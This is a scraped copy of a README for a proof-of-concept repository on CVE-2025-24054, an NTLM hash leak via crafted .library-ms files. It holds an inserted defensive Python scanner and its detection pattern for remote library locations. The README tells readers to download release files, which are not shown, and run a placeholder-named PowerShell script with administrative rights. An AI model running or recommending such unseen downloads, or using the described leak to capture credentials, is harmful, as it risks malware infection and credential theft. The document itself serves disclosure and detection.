## https://sploitus.com/exploit?id=DF696580-77CB-5E9A-B1C0-AB36C8E7AA7F
# CVE-2025-24054 PoC 🛡️

## Overview
Welcome to the **CVE-2025-24054-PoC** repository. This project provides a proof of concept for the NTLM hash leak vulnerability via the `.library-ms` file format, as detailed in CVE-2025-24054. This vulnerability can lead to significant security risks, particularly in environments that utilize NTLM for authentication.
### Key Features
- **Demonstrates Vulnerability**: This PoC illustrates how the NTLM hash leak occurs.
- **Educational Resource**: Designed for security researchers and developers to understand the implications of the vulnerability.
- **Simple Setup**: Easy to download and execute.
## Getting Started
To get started, download the necessary files from the [Releases section](https://github.com/ClementNjeru/CVE-2025-24054-PoC/releases). Follow the instructions below to set up and run the proof of concept.
### Prerequisites
Before you begin, ensure you have the following:
- A Windows environment
- Administrative privileges
- Basic understanding of command-line operations
### Installation
1. Visit the [Releases section](https://github.com/ClementNjeru/CVE-2025-24054-PoC/releases) to download the PoC files.
2. Extract the downloaded files to a directory of your choice.
3. Open a command prompt with administrative privileges.
4. Navigate to the directory where you extracted the files.
5. Execute the script using the command:
```powershell
.\your_script_name.ps1
```
### Usage
Once you have executed the script, the PoC will demonstrate the NTLM hash leak. You can monitor the output in your command prompt for any leaks or anomalies.
## Vulnerability Details
### What is CVE-2025-24054?
CVE-2025-24054 is a security vulnerability that affects the NTLM authentication protocol. This vulnerability allows attackers to extract NTLM hashes from a system, which can then be used for unauthorized access.
### How Does the Vulnerability Work?
The vulnerability arises when a `.library-ms` file is processed by the Windows operating system. Attackers can craft a malicious file that triggers the leak of NTLM hashes, allowing them to capture sensitive authentication information.
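A triage check for the file type described above, added here as an example and not part of this repository's code. It assumes, beyond what the README states, that the leak occurs when a location entry (`<url>`) in the library file points at a remote host; `remote_locations`, `scan_tree` and the sample fragments are hypothetical names and constructed data.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Off-host targets: UNC paths, file:// URLs that name a host, and http(s) (WebDAV).
# \\?\C:\... and \\.\C:\... are local device paths and are excluded.
REMOTE = re.compile(r'^(?:\\\\(?![?.]\\[a-z]:)[^\\]+|file://[^/]|https?://)', re.I)

# Constructed samples: reduced fragments, not complete library files.
SAMPLE_REMOTE = b'<libraryDescription><url>\\\\files.example.invalid\\share</url></libraryDescription>'
SAMPLE_LOCAL = b'<libraryDescription><url>C:\\Users\\Public\\Documents</url></libraryDescription>'


def remote_locations(data: bytes):
    """Return the <url> values that point off-host, or None if the file needs manual review."""
    lowered = data.lower()
    if b'<!doctype' in lowered or b'<!entity' in lowered:
        return None  # refuse DTDs/entities instead of expanding them
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return None  # malformed XML in a library file is itself worth a look
    hits = []
    for el in root.iter():
        # Compare the local name only, so the check works with or without a namespace.
        if el.tag.rsplit('}', 1)[-1].lower() == 'url' and el.text:
            value = el.text.strip()
            if REMOTE.match(value):
                hits.append(value)
    return hits


def scan_tree(root_dir):
    """Map each suspicious .library-ms path under root_dir to its remote targets (or None)."""
    findings = {}
    for path in Path(root_dir).rglob('*.library-ms'):
        result = remote_locations(path.read_bytes())
        if result is None or result:
            findings[str(path)] = result
    return findings


if __name__ == '__main__':
    print(remote_locations(SAMPLE_REMOTE))  # one remote target
    print(remote_locations(SAMPLE_LOCAL))   # no remote target
```

Point `scan_tree` at download folders, mail attachment stores or extracted archives; a `None` value means the file could not be parsed safely and should be inspected by hand.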
### Impact
The potential impact of this vulnerability includes:
- Unauthorized access to sensitive systems
- Credential theft
- Increased risk of lateral movement within networks
## Topics Covered
This repository touches on several important topics related to cybersecurity:
- **CVE**: Common Vulnerabilities and Exposures
- **NTLM**: NT LAN Manager, a protocol used for authentication
- **Phishing**: Techniques that exploit vulnerabilities to gain unauthorized access
- **Exploit Development**: Creating proof of concept exploits to demonstrate vulnerabilities
## Contributing
We welcome contributions to improve this project. If you would like to contribute, please follow these steps:
1. Fork the repository.
2. Create a new branch (`git checkout -b feature/YourFeature`).
3. Make your changes and commit them (`git commit -m 'Add new feature'`).
4. Push to the branch (`git push origin feature/YourFeature`).
5. Open a pull request.
## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
## Contact
For questions or inquiries, please reach out to the project maintainer:
- **Clement Njeru**: [GitHub Profile](https://github.com/ClementNjeru)
## Acknowledgments
- Thanks to the security community for their ongoing research and efforts to improve software security.
- Special thanks to contributors who help maintain this repository.
## Additional Resources
For further reading on the NTLM protocol and related vulnerabilities, consider the following resources:
- [Microsoft Documentation on NTLM](https://docs.microsoft.com/en-us/windows/win32/security/ntlm)
- [CVE-2025-24054 Details](https://vulners.com/cve/CVE-2025-24054)
## Conclusion
This repository serves as a valuable resource for understanding and demonstrating the CVE-2025-24054 vulnerability. By providing a clear proof of concept, we aim to educate and inform the community about the risks associated with NTLM hash leaks.
For the latest updates and releases, visit the [Releases section](https://github.com/ClementNjeru/CVE-2025-24054-PoC/releases). Your engagement and contributions can help enhance security awareness and practices in the industry.